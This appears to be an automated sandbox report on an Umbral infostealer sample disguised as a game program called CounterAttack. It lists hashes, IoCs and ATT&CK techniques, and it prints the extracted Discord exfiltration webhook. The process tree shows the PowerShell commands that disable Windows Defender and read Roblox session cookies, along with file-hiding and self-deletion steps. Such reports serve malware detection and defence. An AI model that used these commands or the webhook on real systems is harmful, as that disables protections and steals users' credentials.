Analysis
-
max time kernel
149s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
09-01-2025 16:56
Behavioral task
behavioral1
Sample
CounterAttack1.3.07.exe
Resource
win7-20240903-en
General
-
Target
CounterAttack1.3.07.exe
-
Size
4.0MB
-
MD5
768fac5fc9b1a6723ec5e88643cfa69b
-
SHA1
ecadbe36d1526e2564eda430956b23d41b08e41a
-
SHA256
98d6a942ccc041bb0534b401fef09d82b4d2a4690673c325217457e625e6259b
-
SHA512
e4219e87335cccf156828c9271b6e619fc2f3ad848eb3a82ddc683679efb86e4575b2c0325ede1f3a06a533cb5bbdce75bd227ff46ee309902ba7e1554411690
-
SSDEEP
49152:NNEVtO1U1y1DDDDDD7Llngq7NNMqU0p2Vhk9aQNEVtO1U1y1DDDDDD7Llngq7NN0:NNEVJyZlng4p2VeNEVJyZlng4p2VMg
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1326955608112496710/UQehMk_daQ2YbkYBZ11umbBWXbi1b3G49GJ1zVYdBwPGpiZwYf8UJiTlt6xSrBCEwhJ_
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/files/0x0007000000016dd0-28.dat family_umbral behavioral1/memory/3020-30-0x0000000000400000-0x0000000000809000-memory.dmp family_umbral behavioral1/memory/2720-33-0x0000000000EA0000-0x0000000000EE0000-memory.dmp family_umbral -
Umbral family
-
pid Process 2412 powershell.exe 1592 powershell.exe 2772 powershell.exe 2120 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Executes dropped EXE 4 IoCs
pid Process 1932 Counter Attack 1.3.071.exe 1316 Extreme Injector v3.exe 2780 Counter Attack 1.3.07.exe 2720 Umbral.exe -
Loads dropped DLL 6 IoCs
pid Process 3020 CounterAttack1.3.07.exe 3020 CounterAttack1.3.07.exe 3020 CounterAttack1.3.07.exe 1932 Counter Attack 1.3.071.exe 1932 Counter Attack 1.3.071.exe 3020 CounterAttack1.3.07.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
flow ioc 13 discord.com 9 raw.githubusercontent.com 10 raw.githubusercontent.com 12 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CounterAttack1.3.07.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Counter Attack 1.3.071.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1980 cmd.exe 1952 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1292 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1952 PING.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2720 Umbral.exe 2120 powershell.exe 2412 powershell.exe 1592 powershell.exe 2632 powershell.exe 2772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2720 Umbral.exe Token: SeDebugPrivilege 1316 Extreme Injector v3.exe Token: 33 1316 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 1316 Extreme Injector v3.exe Token: SeDebugPrivilege 1316 Extreme Injector v3.exe Token: 33 1316 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 1316 Extreme Injector v3.exe Token: 33 1316 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 1316 Extreme Injector v3.exe Token: SeIncreaseQuotaPrivilege 2636 wmic.exe Token: SeSecurityPrivilege 2636 wmic.exe Token: SeTakeOwnershipPrivilege 2636 wmic.exe Token: SeLoadDriverPrivilege 2636 wmic.exe Token: SeSystemProfilePrivilege 2636 wmic.exe Token: SeSystemtimePrivilege 2636 wmic.exe Token: SeProfSingleProcessPrivilege 2636 wmic.exe Token: SeIncBasePriorityPrivilege 2636 wmic.exe Token: SeCreatePagefilePrivilege 2636 wmic.exe Token: SeBackupPrivilege 2636 wmic.exe Token: SeRestorePrivilege 2636 wmic.exe Token: SeShutdownPrivilege 2636 wmic.exe Token: SeDebugPrivilege 2636 wmic.exe Token: SeSystemEnvironmentPrivilege 2636 wmic.exe Token: SeRemoteShutdownPrivilege 2636 wmic.exe Token: SeUndockPrivilege 2636 wmic.exe Token: SeManageVolumePrivilege 2636 wmic.exe Token: 33 2636 wmic.exe Token: 34 2636 wmic.exe Token: 35 2636 wmic.exe Token: SeIncreaseQuotaPrivilege 2636 wmic.exe Token: SeSecurityPrivilege 2636 wmic.exe Token: SeTakeOwnershipPrivilege 2636 wmic.exe Token: SeLoadDriverPrivilege 2636 wmic.exe Token: SeSystemProfilePrivilege 2636 wmic.exe Token: SeSystemtimePrivilege 2636 wmic.exe Token: SeProfSingleProcessPrivilege 2636 wmic.exe Token: SeIncBasePriorityPrivilege 2636 wmic.exe Token: SeCreatePagefilePrivilege 2636 wmic.exe Token: SeBackupPrivilege 2636 wmic.exe Token: SeRestorePrivilege 2636 wmic.exe Token: SeShutdownPrivilege 2636 wmic.exe Token: SeDebugPrivilege 2636 wmic.exe Token: SeSystemEnvironmentPrivilege 2636 wmic.exe Token: SeRemoteShutdownPrivilege 2636 wmic.exe Token: SeUndockPrivilege 2636 wmic.exe Token: SeManageVolumePrivilege 2636 wmic.exe Token: 33 2636 wmic.exe Token: 34 2636 wmic.exe Token: 35 2636 wmic.exe Token: 33 1316 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 1316 Extreme Injector v3.exe Token: SeDebugPrivilege 2120 powershell.exe Token: SeDebugPrivilege 2412 powershell.exe Token: 33 1316 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 1316 Extreme Injector v3.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeDebugPrivilege 2632 powershell.exe Token: 33 1316 Extreme Injector v3.exe Token: SeIncBasePriorityPrivilege 1316 Extreme Injector v3.exe Token: SeIncreaseQuotaPrivilege 2328 wmic.exe Token: SeSecurityPrivilege 2328 wmic.exe Token: SeTakeOwnershipPrivilege 2328 wmic.exe Token: SeLoadDriverPrivilege 2328 wmic.exe Token: SeSystemProfilePrivilege 2328 wmic.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 3020 wrote to memory of 1932 3020 CounterAttack1.3.07.exe 30 PID 3020 wrote to memory of 1932 3020 CounterAttack1.3.07.exe 30 PID 3020 wrote to memory of 1932 3020 CounterAttack1.3.07.exe 30 PID 3020 wrote to memory of 1932 3020 CounterAttack1.3.07.exe 30 PID 3020 wrote to memory of 1316 3020 CounterAttack1.3.07.exe 31 PID 3020 wrote to memory of 1316 3020 CounterAttack1.3.07.exe 31 PID 3020 wrote to memory of 1316 3020 CounterAttack1.3.07.exe 31 PID 3020 wrote to memory of 1316 3020 CounterAttack1.3.07.exe 31 PID 1932 wrote to memory of 2780 1932 Counter Attack 1.3.071.exe 32 PID 1932 wrote to memory of 2780 1932 Counter Attack 1.3.071.exe 32 PID 1932 wrote to memory of 2780 1932 Counter Attack 1.3.071.exe 32 PID 1932 wrote to memory of 2780 1932 Counter Attack 1.3.071.exe 32 PID 3020 wrote to memory of 2720 3020 CounterAttack1.3.07.exe 33 PID 3020 wrote to memory of 2720 3020 CounterAttack1.3.07.exe 33 PID 3020 wrote to memory of 2720 3020 CounterAttack1.3.07.exe 33 PID 3020 wrote to memory of 2720 3020 CounterAttack1.3.07.exe 33 PID 2720 wrote to memory of 2636 2720 Umbral.exe 34 PID 2720 wrote to memory of 2636 2720 Umbral.exe 34 PID 2720 wrote to memory of 2636 2720 Umbral.exe 34 PID 2720 wrote to memory of 2460 2720 Umbral.exe 37 PID 2720 wrote to memory of 2460 2720 Umbral.exe 37 PID 2720 wrote to memory of 2460 2720 Umbral.exe 37 PID 2720 wrote to memory of 2120 2720 Umbral.exe 39 PID 2720 wrote to memory of 2120 2720 Umbral.exe 39 PID 2720 wrote to memory of 2120 2720 Umbral.exe 39 PID 2720 wrote to memory of 2412 2720 Umbral.exe 41 PID 2720 wrote to memory of 2412 2720 Umbral.exe 41 PID 2720 wrote to memory of 2412 2720 Umbral.exe 41 PID 2720 wrote to memory of 1592 2720 Umbral.exe 43 PID 2720 wrote to memory of 1592 2720 Umbral.exe 43 PID 2720 wrote to memory of 1592 2720 Umbral.exe 43 PID 2720 wrote to memory of 2632 2720 Umbral.exe 45 PID 2720 wrote to memory of 2632 2720 Umbral.exe 45 PID 2720 wrote to memory of 2632 2720 Umbral.exe 45 PID 2720 wrote to memory of 2328 2720 Umbral.exe 47 PID 2720 wrote to memory of 2328 2720 Umbral.exe 47 PID 2720 wrote to memory of 2328 2720 Umbral.exe 47 PID 2720 wrote to memory of 2276 2720 Umbral.exe 49 PID 2720 wrote to memory of 2276 2720 Umbral.exe 49 PID 2720 wrote to memory of 2276 2720 Umbral.exe 49 PID 2720 wrote to memory of 1392 2720 Umbral.exe 51 PID 2720 wrote to memory of 1392 2720 Umbral.exe 51 PID 2720 wrote to memory of 1392 2720 Umbral.exe 51 PID 2720 wrote to memory of 2772 2720 Umbral.exe 53 PID 2720 wrote to memory of 2772 2720 Umbral.exe 53 PID 2720 wrote to memory of 2772 2720 Umbral.exe 53 PID 2720 wrote to memory of 1292 2720 Umbral.exe 55 PID 2720 wrote to memory of 1292 2720 Umbral.exe 55 PID 2720 wrote to memory of 1292 2720 Umbral.exe 55 PID 2720 wrote to memory of 1980 2720 Umbral.exe 58 PID 2720 wrote to memory of 1980 2720 Umbral.exe 58 PID 2720 wrote to memory of 1980 2720 Umbral.exe 58 PID 1980 wrote to memory of 1952 1980 cmd.exe 60 PID 1980 wrote to memory of 1952 1980 cmd.exe 60 PID 1980 wrote to memory of 1952 1980 cmd.exe 60 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2460 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\CounterAttack1.3.07.exe"C:\Users\Admin\AppData\Local\Temp\CounterAttack1.3.07.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.071.exe"C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.071.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.07.exe"C:\Users\Admin\AppData\Local\Temp\Counter Attack 1.3.07.exe"3⤵
- Executes dropped EXE
PID:2780
-
-
-
C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"C:\Users\Admin\AppData\Local\Temp\Extreme Injector v3.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:2460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2276
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2772
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1292
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1952
-
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD58a9d3f1c11492db46d1649a14aba4266
SHA16525b42d82adbb783adca2ac3e2142ad4842aaed
SHA25670aea9f2ca823b629f368a0287f9e934859a2b4592ec35eb17965cf91f8af739
SHA5120eef20a88f2c99db810800da67555a656c6919ed064f70f9dec0a0fa1f4ba0e16361df1f26c936fa82b285a8be08d201b4755456d310a965ec8de385ebe098a2
-
Filesize
9KB
MD526abb9e459e5976f658ce80d6433f1b1
SHA13c8f02c1cf7b8ae82be3deea4b360497f6fee1c3
SHA25660cc77b5d4210cef0a9032908b179142f212155426fdae48055c5f72811f7a12
SHA512c2c02aa1db8036c7309100bb683ec7708fedfb129d763d86e03d9d6adc3688423ec04cb5b596eaf99300787f90d641e53350e1ceed0e8b11d6f29333e04b4ce8
-
Filesize
1.9MB
MD569bead9cc091be0dffb03708ee18466c
SHA15c4940dddd513a8f75745d63f21fe53d9b22de49
SHA2563e23ae22cb0d4e7ba836cc3f26ad73a51ff9c2987944f08c6120aeefc608d69b
SHA51203ef8a187c7dd31979728d4a1fd544998f756df9f4af1e64d743f56ca42be648feac440246ff280cb7935cec2b5ecd500b2be69da47d6c598f3434f4c47a5f65
-
Filesize
1.9MB
MD5ec801a7d4b72a288ec6c207bb9ff0131
SHA132eec2ae1f9e201516fa7fcdc16c4928f7997561
SHA256b65f40618f584303ca0bcf9b5f88c233cc4237699c0c4bf40ba8facbe8195a46
SHA512a07dd5e8241de73ce65ff8d74acef4942b85fc45cf6a7baafd3c0f9d330b08e7412f2023ba667e99b40e732a65e8fb4389f7fe73c7b6256ca71e63afe46cdcac
-
Filesize
231KB
MD569ac49033ce70c49a4615c5f32d3786e
SHA1e8088b02cf9c84c027854bf0a8c042764a53ee07
SHA256a233572b6ff043e804d6f2b8fb8e3a076d0e6558e723ad9d2a64e8811e129605
SHA5125456504e8e85afdb6a65570890440f85be458fceaf1c5831c3a5669335170ca290809d7741550377e2bb22c4e7b73828886757149158fb152d4be1a6051787a3